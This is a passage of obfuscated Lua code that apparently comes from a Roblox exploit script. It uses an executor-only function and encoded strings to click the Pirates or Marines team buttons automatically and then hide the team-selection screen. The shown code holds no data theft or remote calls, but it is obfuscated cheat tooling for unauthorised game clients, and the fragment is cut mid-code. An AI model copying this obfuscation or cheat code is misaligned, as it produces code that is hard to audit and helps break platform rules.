in pairs(getconnections(game:GetService(v7("\220\164\2\221\89\254\187","\60\140\200\99\164")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Pirates.Frame.ViewportFrame.TextButton[v270])) do v272.Function();end end elseif (_G.Team==v7("\170\245\22\47\172\130\231","\194\231\148\100\70")) then for v273,v274 in pairs({v7("\107\67\212\176\243\234\83\88\213\172\248\153\101\64\200\160\253","\168\38\44\161\195\150"),v7("\173\243\151\101\53\202\163\2\148\243\140\39\20\231\161\24","\118\224\156\226\22\80\136\214"),v7("\99\237\77\137\84\239\77\133\70","\224\34\142\57")}) do for v277,v278 in pairs(getconnections(game:GetService(v7("\238\171\196\196\118\227\78","\110\190\199\165\189\19\145\61")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v274])) do v278.Function();end end else for v275,v276 in pairs({v7("\247\228\98\251\142\229\207\255\99\231\133\150\249\231\126\235\128","\167\186\139\23\136\235"),v7("\55\186\157\30\31\151\157\25\14\186\134\92\62\186\159\3","\109\122\213\232"),v7("\207\244\182\57\248\246\182\53\234","\80\142\151\194")}) do for v279,v280 in pairs(getconnections(game:GetService(v7("\51\202\118\85\6\212\100","\44\99\166\23")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v276])) do v280.Function();end end end break;end end break;end end end);break;end end break;end end until join==true  game:GetService(v7("\76\251\40\47\54\182\111","\196\28\151\73\86\83")).LocalPlayer.PlayerGui.Main.ChooseTeam.Visible=false;break;end end break;end end end
